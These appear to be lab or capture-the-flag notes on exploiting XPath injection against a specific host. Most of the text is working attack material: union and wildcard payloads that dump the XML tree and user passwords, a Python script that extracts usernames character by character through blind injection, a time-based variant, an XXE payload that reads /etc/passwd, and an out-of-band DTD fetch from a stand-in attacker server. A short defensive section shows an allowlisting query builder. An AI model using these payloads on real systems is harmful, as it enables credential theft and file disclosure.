XPath Advanced Data Exfiltration
XPath Advanced Data Exfiltration Notes
1. Understanding XPath Injection
XPath is used to query XML data.
Injection occurs when user input is inserted into an XPath query without proper sanitization.
Common attacks include authentication bypass, data extraction, and blind XPath injection.
2. Successful Payload Analysis
The working payload:
GET /index.php?q=SOMETHINGINVALID&f=fullstreetname+|+/*[1]/*[2]/*[3]/*[1]/*[3]
The | (union operator) allowed traversal through multiple XML nodes. The nested /*[1]/*[2]/*[3]/*[1]/*[3] structure accessed deeper elements in the XML hierarchy.
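As an added defensive illustration (not code from the original notes or the target application): the two request parameters above, q and f, rebuilt as a vulnerable concatenated query beside a hardened builder that allowlists f and encodes q as a proper XPath 1.0 string literal. The query shape //address[contains(., q)]/f and the field allowlist are assumptions, since the page does not show the server-side code or schema.

```python
import re

# Assumption: the element names the search page is meant to return; the real
# application's schema is not in the notes, so this allowlist is constructed.
ALLOWED_FIELDS = {"fullstreetname", "phone", "email"}
NAME_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_.-]*$")

def xpath_literal(value: str) -> str:
    """Encode an arbitrary string as an XPath 1.0 string literal.
    XPath 1.0 has no escape sequence inside literals, so a value holding both
    quote kinds is assembled with concat(), alternating single-quoted pieces
    with a double-quoted apostrophe."""
    if "'" not in value:
        return f"'{value}'"
    if '"' not in value:
        return f'"{value}"'
    parts = []
    for piece in value.split("'"):
        if piece:
            parts.append(f"'{piece}'")
        parts.append("\"'\"")
    parts.pop()  # one apostrophe token too many after the last piece
    return "concat(" + ", ".join(parts) + ")"

def build_query_vulnerable(q: str, f: str) -> str:
    """The pattern the notes exploit: both parameters spliced in verbatim.
    The query shape is an assumption; the page does not show the server code."""
    return f"//address[contains(., '{q}')]/{f}"

def build_query_hardened(q: str, f: str) -> str:
    """Same query, but f must be an allowlisted bare element name and q is
    encoded as a literal, so neither parameter can change the query structure."""
    if not NAME_RE.match(f) or f not in ALLOWED_FIELDS:
        raise ValueError(f"field not permitted: {f!r}")
    return f"//address[contains(., {xpath_literal(q)})]/{f}"

def is_rejected(q: str, f: str) -> bool:
    """True when the hardened builder refuses the request."""
    try:
        build_query_hardened(q, f)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    union = "fullstreetname | /*[1]/*[2]/*[3]/*[1]/*[3]"  # payload from the notes
    print(build_query_vulnerable("SOMETHINGINVALID", union))
    print("hardened rejects union payload:", is_rejected("SOMETHINGINVALID", union))
    print(build_query_hardened("O'Brien \"Main\"", "email"))
```

The union and //users/... payloads from these notes all fail the bare-name check, and a q value containing quotes can no longer close the literal it sits in.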
3. Additional Exploration
Extract Full XML Structure
Try dumping all available XML elements:
GET /index.php?q=SOMETHINGINVALID&f=| //*
Navigate deeper step by step:
GET /index.php?q=SOMETHINGINVALID&f=| /*/*/*/*
Extract Multiple Fields
To retrieve multiple values at once:
GET /index.php?q=SOMETHINGINVALID&f=fullstreetname | phone | email
Extract Usernames and Passwords
List all users:
GET /index.php?q=SOMETHINGINVALID&f=//users/user/*
Extract credentials:
GET /index.php?q=SOMETHINGINVALID&f=//users/user[1]/password
4. Blind XPath Injection
Boolean-Based Extraction
Check if a username starts with ‘A’:
GET /index.php?q=SOMETHINGINVALID&f=boolean(substring(//users/user/username,1,1)='A')
Automated Character-by-Character Extraction
import requests
import string

url = "http://94.237.53.146:51113/index.php"
extracted_data = ""

for i in range(1, 50):  # Adjust based on expected length
    for char in string.ascii_letters + string.digits:
        # Boolean test: does character i of the username equal this candidate?
        payload = f"substring(//users/user/username,{i},1)='{char}'"
        response = requests.get(url, params={"q": "SOMETHINGINVALID", "f": payload})
        if "valid response" in response.text:  # Adjust based on response behavior
            extracted_data += char
            print(f"Extracted so far: {extracted_data}")
            break

print(f"Final Extracted Data: {extracted_data}")
5. Advanced Attacks
Time-Based Blind Injection
If there’s no direct output, force longer responses:
GET /index.php?q=SOMETHINGINVALID&f=if(boolean(substring(//users/user/username,1,1)='A'), //*[count(//users/user/*) > 100000], //*[1])
Testing for XXE Injection
<?xml version="1.0"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<foo>&xxe;</foo>
If the response includes file contents, the server is vulnerable.
Out-of-Band (OOB) Data Exfiltration
<!DOCTYPE foo [ <!ENTITY % remote SYSTEM "http://your-server.com/malicious.dtd"> %remote; ]>
If the server contacts your external URL, it confirms an OOB vulnerability.
Conclusion
XPath injection was successfully exploited.
Additional attacks were tested for further enumeration.
Blind extraction techniques and external entity vulnerabilities were explored.